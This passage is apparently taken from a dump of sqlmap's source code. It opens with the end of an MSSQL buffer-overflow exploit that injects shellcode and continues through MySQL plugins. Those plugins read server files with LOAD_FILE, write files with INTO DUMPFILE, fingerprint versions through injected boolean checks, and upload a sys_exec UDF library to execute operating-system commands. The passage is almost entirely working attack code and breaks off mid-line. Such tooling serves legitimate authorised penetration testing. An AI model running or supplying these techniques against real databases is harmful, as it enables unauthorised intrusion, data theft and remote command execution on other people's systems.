CHAR(0x6a)+CHAR(0x00)+char(0xc3)\n            SET @counter = @counter + 302\n            SET @val =  CHAR(0x43)\n            CONTINUE\n          END\n          SET @buf = @buf + @val\n        END\n        SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41'''\n        EXEC master..sp_executesql @buf\n        \"\"\" % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], addrs[6], addrs[7], shellcodeChar)\n\n        self.spExploit = self.spExploit.replace(\"    \", \"\").replace(\"\\n\", \" \")\n\n        logger.info(\"triggering the buffer overflow vulnerability, please wait..\")\n        inject.goStacked(self.spExploit, silent=True)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mysql/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import MYSQL_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.mysql.enumeration import Enumeration\nfrom plugins.dbms.mysql.filesystem import Filesystem\nfrom plugins.dbms.mysql.fingerprint import Fingerprint\nfrom plugins.dbms.mysql.syntax import Syntax\nfrom plugins.dbms.mysql.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines MySQL methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = MYSQL_SYSTEM_DBS\n        self.sysUdfs = {\n            # UDF name: UDF return data-type\n            \"sys_exec\": {\"return\": \"int\"},\n            \"sys_eval\": {\"return\": \"string\"},\n            \"sys_bineval\": {\"return\": \"int\"}\n        }\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.MYSQL] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mysql/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import pymysql\nexcept:\n    pass\n\nimport logging\nimport struct\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://github.com/PyMySQL/PyMySQL\n    User guide: https://pymysql.readthedocs.io/en/latest/\n    Debian package: python3-pymysql\n    License: MIT\n\n    Possible connectors: http://wiki.python.org/moin/MySQL\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)\n        except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError, struct.error) as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except pymysql.ProgrammingError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        retVal = False\n\n        try:\n            self.cursor.execute(query)\n            retVal = True\n        except (pymysql.OperationalError, pymysql.ProgrammingError) as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) %s\" % getSafeExString(ex))\n        except pymysql.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n        return retVal\n\n    def select(self, query):\n        retVal = None\n\n        if self.execute(query):\n            retVal = self.fetchall()\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mysql/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    pass\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mysql/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.agent import agent\nfrom lib.core.common import getSQLSnippet\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import randomStr\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.enums import PLACE\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.request import inject\nfrom lib.request.connect import Connect as Request\nfrom lib.techniques.union.use import unionUse\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def nonStackedReadFile(self, rFile):\n        if not kb.bruteMode:\n            infoMsg = \"fetching file: '%s'\" % rFile\n            logger.info(infoMsg)\n\n        result = inject.getValue(\"HEX(LOAD_FILE('%s'))\" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL)\n\n        return result\n\n    def stackedReadFile(self, remoteFile):\n        if not kb.bruteMode:\n            infoMsg = \"fetching file: '%s'\" % remoteFile\n            logger.info(infoMsg)\n\n        self.createSupportTbl(self.fileTblName, self.tblField, \"longtext\")\n        self.getRemoteTempPath()\n\n        tmpFile = \"%s/tmpf%s\" % (conf.tmpPath, randomStr(lowercase=True))\n\n        debugMsg = \"saving hexadecimal encoded content of file '%s' \" % remoteFile\n        debugMsg += \"into temporary file '%s'\" % tmpFile\n        logger.debug(debugMsg)\n        inject.goStacked(\"SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'\" % (remoteFile, tmpFile))\n\n        debugMsg = \"loading the content of hexadecimal encoded file \"\n        debugMsg += \"'%s' into support table\" % remoteFile\n        logger.debug(debugMsg)\n        inject.goStacked(\"LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)\" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))\n\n        length = inject.getValue(\"SELECT LENGTH(%s) FROM %s\" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n        if not isNumPosStrValue(length):\n            warnMsg = \"unable to retrieve the content of the \"\n            warnMsg += \"file '%s'\" % remoteFile\n\n            if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):\n                if not kb.bruteMode:\n                    warnMsg += \", going to fall-back to simpler UNION technique\"\n                    logger.warning(warnMsg)\n                result = self.nonStackedReadFile(remoteFile)\n            else:\n                raise SqlmapNoneDataException(warnMsg)\n        else:\n            length = int(length)\n            chunkSize = 1024\n\n            if length > chunkSize:\n                result = []\n\n                for i in xrange(1, length, chunkSize):\n                    chunk = inject.getValue(\"SELECT MID(%s, %d, %d) FROM %s\" % (self.tblField, i, chunkSize, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)\n                    result.append(chunk)\n            else:\n                result = inject.getValue(\"SELECT %s FROM %s\" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)\n\n        return result\n\n    @stackedmethod\n    def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):\n        logger.debug(\"encoding file to its hexadecimal string value\")\n\n        fcEncodedList = self.fileEncode(localFile, \"hex\", True)\n        fcEncodedStr = fcEncodedList[0]\n        fcEncodedStrLen = len(fcEncodedStr)\n\n        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:\n            warnMsg = \"as the injection is on a GET parameter and the file \"\n            warnMsg += \"to be written hexadecimal value is %d \" % fcEncodedStrLen\n            warnMsg += \"bytes, this might cause errors in the file \"\n            warnMsg += \"writing process\"\n            logger.warning(warnMsg)\n\n        debugMsg = \"exporting the %s file content to file '%s'\" % (fileType, remoteFile)\n        logger.debug(debugMsg)\n\n        pushValue(kb.forceWhere)\n        kb.forceWhere = PAYLOAD.WHERE.NEGATIVE\n        sqlQuery = \"%s INTO DUMPFILE '%s'\" % (fcEncodedStr, remoteFile)\n        unionUse(sqlQuery, unpack=False)\n        kb.forceWhere = popValue()\n\n        warnMsg = \"expect junk characters inside the \"\n        warnMsg += \"file as a leftover from UNION query\"\n        singleTimeWarnMessage(warnMsg)\n\n        return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)\n\n    def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):\n        logger.debug(\"encoding file to its hexadecimal string value\")\n\n        fcEncodedList = self.fileEncode(localFile, \"hex\", True)\n        fcEncodedStr = fcEncodedList[0][2:]\n        fcEncodedStrLen = len(fcEncodedStr)\n\n        if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:\n            warnMsg = \"the injection is on a GET parameter and the file \"\n            warnMsg += \"to be written hexadecimal value is %d \" % fcEncodedStrLen\n            warnMsg += \"bytes, this might cause errors in the file \"\n            warnMsg += \"writing process\"\n            logger.warning(warnMsg)\n\n        debugMsg = \"exporting the %s file content to file '%s'\" % (fileType, remoteFile)\n        logger.debug(debugMsg)\n\n        query = getSQLSnippet(DBMS.MYSQL, \"write_file_limit\", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr)\n        query = agent.prefixQuery(query)        # Note: No need for suffix as 'write_file_limit' already ends with comment (required)\n        payload = agent.payload(newValue=query)\n        Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)\n\n        warnMsg = \"expect junk characters inside the \"\n        warnMsg += \"file as a leftover from original query\"\n        singleTimeWarnMessage(warnMsg)\n\n        return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)\n\n    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):\n        debugMsg = \"creating a support table to write the hexadecimal \"\n        debugMsg += \"encoded file to\"\n        logger.debug(debugMsg)\n\n        self.createSupportTbl(self.fileTblName, self.tblField, \"longblob\")\n\n        logger.debug(\"encoding file to its hexadecimal string value\")\n        fcEncodedList = self.fileEncode(localFile, \"hex\", False)\n\n        debugMsg = \"forging SQL statements to write the hexadecimal \"\n        debugMsg += \"encoded file to the support table\"\n        logger.debug(debugMsg)\n\n        sqlQueries = self.fileToSqlQueries(fcEncodedList)\n\n        logger.debug(\"inserting the hexadecimal encoded file to the support table\")\n\n        inject.goStacked(\"SET GLOBAL max_allowed_packet = %d\" % (1024 * 1024))  # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230)\n\n        for sqlQuery in sqlQueries:\n            inject.goStacked(sqlQuery)\n\n        debugMsg = \"exporting the %s file content to file '%s'\" % (fileType, remoteFile)\n        logger.debug(debugMsg)\n\n        # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html\n        inject.goStacked(\"SELECT %s FROM %s INTO DUMPFILE '%s'\" % (self.tblField, self.fileTblName, remoteFile), silent=True)\n\n        return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mysql/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import FORK\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import OS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import MYSQL_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.MYSQL)\n\n    def _commentCheck(self):\n        infoMsg = \"executing %s comment injection fingerprint\" % DBMS.MYSQL\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"[RANDNUM]=[RANDNUM]/* NoValue */\")\n\n        if not result:\n            warnMsg = \"unable to perform %s comment injection\" % DBMS.MYSQL\n            logger.warning(warnMsg)\n\n            return None\n\n        # Reference: https://downloads.mysql.com/archives/community/\n        # Reference: https://dev.mysql.com/doc/relnotes/mysql/<major>.<minor>/en/\n\n        versions = (\n            (80000, 80029),  # MySQL 8.0\n            (60000, 60014),  # MySQL 6.0\n            (50700, 50737),  # MySQL 5.7\n            (50600, 50652),  # MySQL 5.6\n            (50500, 50563),  # MySQL 5.5\n            (50400, 50404),  # MySQL 5.4\n            (50100, 50174),  # MySQL 5.1\n            (50000, 50097),  # MySQL 5.0\n            (40100, 40131),  # MySQL 4.1\n            (40000, 40032),  # MySQL 4.0\n            (32300, 32359),  # MySQL 3.23\n            (32200, 32235),  # MySQL 3.22\n        )\n\n        found = False\n        for candidate in versions:\n            result = inject.checkBooleanExpression(\"[RANDNUM]=[RANDNUM]/*!%d AND [RANDNUM1]=[RANDNUM2]*/\" % candidate[0])\n\n            if not result:\n                found = True\n                break\n\n        if found:\n            for version in xrange(candidate[1], candidate[0] - 1, -1):\n                version = getUnicode(version)\n                result = inject.checkBooleanExpression(\"[RANDNUM]=[RANDNUM]/*!%s AND [RANDNUM1]=[RANDNUM2]*/\" % version)\n\n                if not result:\n                    if version[0] == \"3\":\n                        midVer = version[1:3]\n                    else:\n                        midVer = version[2]\n\n                    trueVer = \"%s.%s.%s\" % (version[0], midVer, version[3:])\n\n                    return trueVer\n\n        return None\n\n    def getFingerprint(self):\n        fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)\n\n        if fork is None:\n            if inject.checkBooleanExpression(\"VERSION() LIKE '%MariaDB%'\"):\n                fork = FORK.MARIADB\n            elif inject.checkBooleanExpression(\"VERSION() LIKE '%TiDB%'\"):\n                fork = FORK.TIDB\n            elif inject.checkBooleanExpression(\"@@VERSION_COMMENT LIKE '%drizzle%'\"):\n                fork = FORK.DRIZZLE\n            elif inject.checkBooleanExpression(\"@@VERSION_COMMENT LIKE '%Percona%'\"):\n                fork = FORK.PERCONA\n            elif inject.checkBooleanExpression(\"AURORA_VERSION() LIKE '%'\"):            # Reference: https://aws.amazon.com/premiumsupport/knowledge-center/aurora-version-number/\n                fork = FORK.AURORA\n            else:\n                fork = \"\"\n\n            hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)\n\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp and not conf.api:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp and not conf.api:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n        actVer = Format.getDbms()\n\n        if not conf.extensiveFp:\n            value += actVer\n            if fork:\n                value += \" (%s fork)\" % fork\n            return value\n\n        comVer = self._commentCheck()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if comVer:\n            comVer = Format.getDbms([comVer])\n            value += \"\\n%scomment injection fingerprint: %s\" % (blank, comVer)\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                if banVer and re.search(r\"-log$\", kb.data.banner or \"\"):\n                    banVer += \", logging enabled\"\n\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        if fork:\n            value += \"\\n%sfork fingerprint: %s\" % (blank, fork)\n\n        return value\n\n    def checkDbms(self):\n        \"\"\"\n        References for fingerprint:\n\n        * http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html (up to 5.0.89)\n        * http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html (up to 5.1.42)\n        * http://dev.mysql.com/doc/refman/5.4/en/news-5-4-x.html (up to 5.4.4)\n        * http://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html (up to 5.5.0)\n        * http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn)\n        \"\"\"\n\n        if not conf.extensiveFp and Backend.isDbmsWithin(MYSQL_ALIASES):\n            setDbms(\"%s %s\" % (DBMS.MYSQL, Backend.getVersion()))\n\n            if Backend.isVersionGreaterOrEqualThan(\"5\") or inject.checkBooleanExpression(\"DATABASE() LIKE SCHEMA()\"):\n                kb.data.has_information_schema = True\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.MYSQL\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"QUARTER(NULL) IS NULL\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.MYSQL\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"SESSION_USER() LIKE USER()\")\n\n            if not result:\n                # Note: MemSQL doesn't support SESSION_USER()\n                result = inject.checkBooleanExpression(\"GEOGRAPHY_AREA(NULL) IS NULL\")\n\n                if result:\n                    hashDBWrite(HASHDB_KEYS.DBMS_FORK, FORK.MEMSQL)\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.MYSQL\n                logger.warning(warnMsg)\n\n                return False\n\n            # reading information_schema on some platforms is causing annoying timeout exits\n            # Reference: http://bugs.mysql.com/bug.php?id=15855\n\n            kb.data.has_information_schema = True\n\n            # Determine if it is MySQL >= 8.0.0\n            if inject.checkBooleanExpression(\"ISNULL(JSON_STORAGE_FREE(NULL))\"):\n                Backend.setVersion(\">= 8.0.0\")\n                setDbms(\"%s 8\" % DBMS.MYSQL)\n                self.getBanner()\n\n            # Determine if it is MySQL >= 5.0.0\n            elif inject.checkBooleanExpression(\"ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],NULL))\"):\n                Backend.setVersion(\">= 5.0.0\")\n                setDbms(\"%s 5\" % DBMS.MYSQL)\n                self.getBanner()\n\n                if not conf.extensiveFp:\n                    return True\n\n                infoMsg = \"actively fingerprinting %s\" % DBMS.MYSQL\n                logger.info(infoMsg)\n\n                # Check if it is MySQL >= 5.7\n                if inject.checkBooleanExpression(\"ISNULL(JSON_QUOTE(NULL))\"):\n                    Backend.setVersion(\">= 5.7\")\n\n                # Check if it is MySQL >= 5.6\n                elif inject.checkBooleanExpression(\"ISNULL(VALIDATE_PASSWORD_STRENGTH(NULL))\"):\n                    Backend.setVersion(\">= 5.6\")\n\n                # Check if it is MySQL >= 5.5\n                elif inject.checkBooleanExpression(\"TO_SECONDS(950501)>0\"):\n                    Backend.setVersion(\">= 5.5\")\n\n                # Check if it is MySQL >= 5.1.2 and < 5.5.0\n                elif inject.checkBooleanExpression(\"@@table_open_cache=@@table_open_cache\"):\n                    if inject.checkBooleanExpression(\"[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)\"):\n                        Backend.setVersionList([\">= 5.1.12\", \"< 5.5.0\"])\n                    elif inject.checkBooleanExpression(\"[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PROCESSLIST LIMIT 0, 1)\"):\n                        Backend.setVersionList([\">= 5.1.7\", \"< 5.1.12\"])\n                    elif inject.checkBooleanExpression(\"[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PARTITIONS LIMIT 0, 1)\"):\n                        Backend.setVersion(\"= 5.1.6\")\n                    elif inject.checkBooleanExpression(\"[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PLUGINS LIMIT 0, 1)\"):\n                        Backend.setVersionList([\">= 5.1.5\", \"< 5.1.6\"])\n                    else:\n                        Backend.setVersionList([\">= 5.1.2\", \"< 5.1.5\"])\n\n                # Check if it is MySQL >= 5.0.0 and < 5.1.2\n                elif inject.checkBooleanExpression(\"@@hostname=@@hostname\"):\n                    Backend.setVersionList([\">= 5.0.38\", \"< 5.1.2\"])\n                elif inject.checkBooleanExpression(\"@@character_set_filesystem=@@character_set_filesystem\"):\n                    Backend.setVersionList([\">= 5.0.19\", \"< 5.0.38\"])\n                elif not inject.checkBooleanExpression(\"[RANDNUM]=(SELECT [RANDNUM] FROM DUAL WHERE [RANDNUM1]!=[RANDNUM2])\"):\n                    Backend.setVersionList([\">= 5.0.11\", \"< 5.0.19\"])\n                elif inject.checkBooleanExpression(\"@@div_precision_increment=@@div_precision_increment\"):\n                    Backend.setVersionList([\">= 5.0.6\", \"< 5.0.11\"])\n                elif inject.checkBooleanExpression(\"@@automatic_sp_privileges=@@automatic_sp_privileges\"):\n                    Backend.setVersionList([\">= 5.0.3\", \"< 5.0.6\"])\n                else:\n                    Backend.setVersionList([\">= 5.0.0\", \"< 5.0.3\"])\n\n            elif inject.checkBooleanExpression(\"DATABASE() LIKE SCHEMA()\"):\n                Backend.setVersion(\">= 5.0.2\")\n                setDbms(\"%s 5\" % DBMS.MYSQL)\n                self.getBanner()\n\n            elif inject.checkBooleanExpression(\"STRCMP(LOWER(CURRENT_USER()), UPPER(CURRENT_USER()))=0\"):\n                Backend.setVersion(\"< 5.0.0\")\n                setDbms(\"%s 4\" % DBMS.MYSQL)\n                self.getBanner()\n\n                kb.data.has_information_schema = False\n\n                if not conf.extensiveFp:\n                    return True\n\n                # Check which version of MySQL < 5.0.0 it is\n                if inject.checkBooleanExpression(\"3=(SELECT COERCIBILITY(USER()))\"):\n                    Backend.setVersionList([\">= 4.1.11\", \"< 5.0.0\"])\n                elif inject.checkBooleanExpression(\"2=(SELECT COERCIBILITY(USER()))\"):\n                    Backend.setVersionList([\">= 4.1.1\", \"< 4.1.11\"])\n                elif inject.checkBooleanExpression(\"CURRENT_USER()=CURRENT_USER()\"):\n                    Backend.setVersionList([\">= 4.0.6\", \"< 4.1.1\"])\n\n                    if inject.checkBooleanExpression(\"'utf8'=(SELECT CHARSET(CURRENT_USER()))\"):\n                        Backend.setVersion(\"= 4.1.0\")\n                    else:\n                        Backend.setVersionList([\">= 4.0.6\", \"< 4.1.0\"])\n                else:\n                    Backend.setVersionList([\">= 4.0.0\", \"< 4.0.6\"])\n            else:\n                Backend.setVersion(\"< 4.0.0\")\n                setDbms(\"%s 3\" % DBMS.MYSQL)\n                self.getBanner()\n\n                kb.data.has_information_schema = False\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.MYSQL\n            logger.warning(warnMsg)\n\n            return False\n\n    def checkDbmsOs(self, detailed=False):\n        if Backend.getOs():\n            return\n\n        infoMsg = \"fingerprinting the back-end DBMS operating system\"\n        logger.info(infoMsg)\n\n        result = inject.checkBooleanExpression(\"'W'=UPPER(MID(@@version_compile_os,1,1))\")\n\n        if result:\n            Backend.setOs(OS.WINDOWS)\n        elif not result:\n            Backend.setOs(OS.LINUX)\n\n        if Backend.getOs():\n            infoMsg = \"the back-end DBMS operating system is %s\" % Backend.getOs()\n            logger.info(infoMsg)\n        else:\n            self.userChooseDbmsOs()\n\n        self.cleanup(onlyFileTbl=True)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mysql/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport binascii\n\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getOrds\nfrom lib.core.convert import getUnicode\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT 0x6162636465666768 FROM foobar\"\n        True\n        >>> Syntax.escape(u\"SELECT 'abcd\\xebfgh' FROM foobar\") == \"SELECT CONVERT(0x61626364c3ab666768 USING utf8) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            if all(_ < 128 for _ in getOrds(value)):\n                return \"0x%s\" % getUnicode(binascii.hexlify(getBytes(value)))\n            else:\n                return \"CONVERT(0x%s USING utf8)\" % getUnicode(binascii.hexlify(getBytes(value, \"utf8\")))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/mysql/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import decloakToTemp\nfrom lib.core.common import isStackingAvailable\nfrom lib.core.common import isWindowsDriveLetterPath\nfrom lib.core.common import normalizePath\nfrom lib.core.common import ntToPosixSlashes\nfrom lib.core.common import randomStr\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.compat import LooseVersion\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import paths\nfrom lib.core.enums import OS\nfrom lib.request import inject\nfrom lib.request.connect import Connect as Request\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def __init__(self):\n        self.__basedir = None\n        self.__datadir = None\n        self.__plugindir = None\n\n        GenericTakeover.__init__(self)\n\n    def udfSetRemotePath(self):\n        self.getVersionFromBanner()\n\n        banVer = kb.bannerFp[\"dbmsVersion\"]\n\n        if banVer and LooseVersion(banVer) >= LooseVersion(\"5.0.67\"):\n            if self.__plugindir is None:\n                logger.info(\"retrieving MySQL plugin directory absolute path\")\n                self.__plugindir = unArrayizeValue(inject.getValue(\"SELECT @@plugin_dir\"))\n\n            # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0\n            if self.__plugindir is None and LooseVersion(banVer) >= LooseVersion(\"5.1.19\"):\n                logger.info(\"retrieving MySQL base directory absolute path\")\n\n                # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir\n                self.__basedir = unArrayizeValue(inject.getValue(\"SELECT @@basedir\"))\n\n                if isWindowsDriveLetterPath(self.__basedir or \"\"):\n                    Backend.setOs(OS.WINDOWS)\n                else:\n                    Backend.setOs(OS.LINUX)\n\n                # The DLL must be in C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\n                if Backend.isOs(OS.WINDOWS):\n                    self.__plugindir = \"%s/lib/plugin\" % self.__basedir\n                else:\n                    self.__plugindir = \"%s/lib/mysql/plugin\" % self.__basedir\n\n            self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir)) or '.'\n\n            self.udfRemoteFile = \"%s/%s.%s\" % (self.__plugindir, self.udfSharedLibName, self.udfSharedLibExt)\n\n        # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file\n        # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file\n        else:\n            # logger.debug(\"retrieving MySQL data directory absolute path\")\n\n            # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir\n            # self.__datadir = inject.getValue(\"SELECT @@datadir\")\n\n            # NOTE: specifying the relative path as './udf.dll'\n            # saves in @@datadir on both MySQL 4.1 and MySQL 5.0\n            self.__datadir = '.'\n            self.__datadir = ntToPosixSlashes(normalizePath(self.__datadir))\n\n            # The DLL can be in either C:\\WINDOWS, C:\\WINDOWS\\system,\n            # C:\\WINDOWS\\system32, @@basedir\\bin or @@datadir\n            self.udfRemoteFile = \"%s/%s.%s\" % (self.__datadir, self.udfSharedLibName, self.udfSharedLibExt)\n\n    def udfSetLocalPaths(self):\n        self.udfLocalFile = paths.SQLMAP_UDF_PATH\n        self.udfSharedLibName = \"libs%s\" % randomStr(lowercase=True)\n\n        if Backend.isOs(OS.WINDOWS):\n            _ = os.path.join(self.udfLocalFile, \"mysql\", \"windows\", \"%d\" % Backend.getArch(), \"lib_mysqludf_sys.dll_\")\n            self.udfLocalFile = decloakToTemp(_)\n            self.udfSharedLibExt = \"dll\"\n        else:\n            _ = os.path.join(self.udfLocalFile, \"mysql\", \"linux\", \"%d\" % Backend.getArch(), \"lib_mysqludf_sys.so_\")\n            self.udfLocalFile = decloakToTemp(_)\n            self.udfSharedLibExt = \"so\"\n\n    def udfCreateFromSharedLib(self, udf, inpRet):\n        if udf in self.udfToCreate:\n            logger.info(\"creating UDF '%s' from the binary UDF file\" % udf)\n\n            ret = inpRet[\"return\"]\n\n            # Reference: http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html\n            inject.goStacked(\"DROP FUNCTION %s\" % udf)\n            inject.goStacked(\"CREATE FUNCTION %s RETURNS %s SONAME '%s.%s'\" % (udf, ret, self.udfSharedLibName, self.udfSharedLibExt))\n\n            self.createdUdf.add(udf)\n        else:\n            logger.debug(\"keeping existing UDF '%s' as requested\" % udf)\n\n    def uncPathRequest(self):\n        if not isStackingAvailable():\n            query = agent.prefixQuery(\"AND LOAD_FILE('%s')\" % 